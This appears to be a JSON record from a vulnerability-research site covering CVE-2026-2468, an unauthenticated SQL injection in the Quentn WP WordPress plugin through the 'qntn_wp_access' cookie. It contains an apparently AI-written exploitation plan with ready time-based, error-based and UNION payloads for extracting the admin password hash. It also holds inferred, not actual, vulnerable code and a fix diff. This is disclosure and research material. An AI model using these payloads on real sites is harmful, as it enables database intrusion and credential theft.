[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f5HUWaFCV-z_LuD_sUSAif7GqT3fWS08GOnZTA4wtJsE":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-2468","quentn-wp-unauthenticated-sql-injection-via-qntnwpaccess-cookie","Quentn WP \u003C= 1.2.12 - Unauthenticated SQL Injection via 'qntn_wp_access' Cookie","The Quentn WP plugin for WordPress is vulnerable to SQL Injection via the 'qntn_wp_access' cookie in all versions up to, and including, 1.2.12 This is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query in the `get_user_access()` method. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","quentn-wp",null,"\u003C=1.2.12","1.2.13","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-03-20 15:05:50","2026-04-27 18:10:06",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F653e20ae-f018-41b5-a973-f73fddae70e5?source=api-prod",38,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-2468 (Quentn WP SQL Injection)\n\n## 1. Vulnerability Summary\nThe **Quentn WP** plugin (versions \u003C= 1.2.12) is vulnerable to an unauthenticated SQL Injection vulnerability. The flaw exists within the `get_user_access()` method, which processes the `qntn_wp_access` cookie. The plugin fails to adequately sanitize or use prepared statements (`$wpdb->prepare()`) when incorporating the cookie value into a database query. This allows an unauthenticated attacker to append arbitrary SQL commands, enabling the extraction of sensitive data such as user credentials, configuration secrets, and database schema information.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** Any frontend WordPress page (e.g., the homepage `\u002F`).\n- **Trigger:** The vulnerability is triggered during the WordPress lifecycle (likely `init` or `template_redirect`) when the plugin checks the visitor's access level via the `qntn_wp_access` cookie.\n- **Vulnerable Parameter:** The `qntn_wp_access` HTTP Cookie.\n- **Authentication:** Unauthenticated (No login required).\n- **Preconditions:** The Quentn WP plugin must be active. The vulnerability is most likely to trigger on pages where Quentn access control logic is executed.\n\n## 3. Code Flow (Inferred)\n1. **Request Entry:** A visitor sends an HTTP GET request to the WordPress site.\n2. **Hook Execution:** WordPress triggers the `init` or `wp` hook.\n3. **Plugin Logic:** The Quentn WP plugin's initialization logic (likely in a main class or a frontend-specific controller) checks for the presence of the `qntn_wp_access` cookie.\n4. **Vulnerable Method:** The plugin calls `get_user_access()` (identified in the CVE description).\n5. **Data Extraction:** `get_user_access()` retrieves the value of `$_COOKIE['qntn_wp_access']`.\n6. **SQL Sink:** The unsanitized cookie value is concatenated directly into a query string and passed to a `$wpdb` method (e.g., `$wpdb->get_results()` or `$wpdb->get_row()`) without using `$wpdb->prepare()`.\n\n## 4. Nonce Acquisition Strategy\nBased on the vulnerability description, this is a **Cookie-based SQL Injection** occurring during a standard page load or initialization. \n- **Nonce Requirement:** This endpoint does **not** require a WordPress nonce because it is triggered via a cookie on a public-facing GET request, rather than an AJAX or REST API action.\n- **Bypass:** If the plugin does perform a check, it is likely checking for the existence of the cookie rather than a CSRF token.\n\n## 5. Exploitation Strategy\nThe goal is to demonstrate data extraction via Time-Based Blind SQL Injection, as the results of the query in `get_user_access()` are likely used for internal logic (access control) and not directly reflected in the response body.\n\n### Step 1: Confirmation (Time-Based)\nConfirm the vulnerability by inducing a delay.\n- **Request Type:** GET\n- **URL:** `\u002F`\n- **Cookie:** `qntn_wp_access=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -`\n- **Tool:** `http_request`\n\n### Step 2: Data Extraction (Boolean or Time-Based)\nExtract the administrator's password hash from the `wp_users` table.\n- **Payload (Time-Based):** \n `qntn_wp_access=1' AND IF(ASCII(SUBSTRING((SELECT user_pass FROM wp_users WHERE ID=1),1,1))=36,SLEEP(5),0)-- -`\n *(Note: 36 is the ASCII for '$', which is the start of most WordPress phpass hashes.)*\n\n### Step 3: Automated Extraction\nUse a series of requests to determine the character at each position of the password hash.\n\n## 6. Test Data Setup\n1. **Plugin Installation:** Install and activate Quentn WP \u003C= 1.2.12.\n2. **Standard Content:** Ensure at least one post or page exists.\n3. **Admin User:** Ensure the default admin user (ID 1) exists with a known password (for verification).\n4. **Plugin Configuration (Optional):** If the code path requires the plugin to be \"configured,\" use WP-CLI to set dummy options:\n - `wp option update quentn_api_key \"dummy_key\"` (inferred option name)\n\n## 7. Expected Results\n- **Success Indicator:** A request with a `SLEEP(5)` payload should result in a response time significantly greater than 5 seconds.\n- **Data Exposure:** The attacker can successfully reconstruct the `$P$...` hash of the admin user.\n- **HTTP Response:** The HTTP status code will likely be 200 OK, but the response time is the primary indicator of success.\n\n## 8. Verification Steps\nAfter the exploitation attempts:\n1. **Check DB State:** Use WP-CLI to get the actual hash and compare it with the extracted value.\n - `wp db query \"SELECT user_pass FROM wp_users WHERE ID=1;\"`\n2. **Review Logs:** If `WP_DEBUG` was enabled, check `wp-content\u002Fdebug.log` for any SQL error messages that might have leaked during the \"probing\" phase.\n\n## 9. Alternative Approaches\n- **Error-Based SQLi:** If the site has `WP_DEBUG` or `DISPLAY_ERRORS` enabled, use `extractvalue()` or `updatexml()` to force the database to leak information in the error message.\n - **Payload:** `qntn_wp_access=1' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(0x7e,(SELECT user_login FROM wp_users LIMIT 1),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- -`\n- **Union-Based SQLi:** If the plugin happens to output the result of `get_user_access()` (e.g., in a debug comment or a data attribute), try a `UNION SELECT` to reflect the version or user.\n - **Payload:** `qntn_wp_access=1' UNION SELECT 1,2,version(),4-- -` (Column count must be guessed).","The Quentn WP plugin for WordPress is vulnerable to unauthenticated SQL Injection via the 'qntn_wp_access' cookie in versions up to 1.2.12. The vulnerability resides in the get_user_access() method, which fails to sanitize or use prepared statements when querying the database with user-supplied cookie data.","\u002F\u002F Inferred from vulnerability description and research plan\n\u002F\u002F Likely in a class file such as includes\u002Fclass-quentn-wp.php\n\npublic function get_user_access() {\n if (isset($_COOKIE['qntn_wp_access'])) {\n global $wpdb;\n $access_id = $_COOKIE['qntn_wp_access'];\n \n \u002F\u002F Vulnerability: Direct concatenation of cookie value into SQL query without preparation\n $query = \"SELECT * FROM {$wpdb->prefix}quentn_access WHERE access_id = '$access_id'\";\n $results = $wpdb->get_results($query);\n \n return $results;\n }\n return null;\n}","--- a\u002Fincludes\u002Fclass-quentn-wp.php\n+++ b\u002Fincludes\u002Fclass-quentn-wp.php\n@@ -10,7 +10,10 @@\n if (isset($_COOKIE['qntn_wp_access'])) {\n global $wpdb;\n $access_id = $_COOKIE['qntn_wp_access'];\n- $query = \"SELECT * FROM {$wpdb->prefix}quentn_access WHERE access_id = '$access_id'\";\n- $results = $wpdb->get_results($query);\n+ $results = $wpdb->get_results(\n+ $wpdb->prepare(\n+ \"SELECT * FROM {$wpdb->prefix}quentn_access WHERE access_id = %s\",\n+ $access_id\n+ )\n+ );\n return $results;\n }","The exploit targets the 'qntn_wp_access' cookie, which is processed on every page load to determine visitor access levels. An unauthenticated attacker can send a GET request to any frontend URL (e.g., the homepage) while supplying a crafted SQL injection payload in the 'qntn_wp_access' cookie. A typical payload would use time-based blind SQLi (e.g., ' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -) to confirm vulnerability. Because the plugin does not use $wpdb->prepare() or sanitize the cookie value before passing it to $wpdb->get_results(), the attacker can extract sensitive information like the administrator's password hash by observing the response timing of boolean-based sleep queries.","gemini-3-flash-preview","2026-04-18 01:12:10","2026-04-18 01:12:27",{"type":34,"vulnerable_version":35,"fixed_version":9,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":9,"fixed_zip":9,"all_tags":38},"plugin","1.2.9","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fquentn-wp\u002Ftags\u002F1.2.9","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fquentn-wp.1.2.9.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fquentn-wp\u002Ftags"]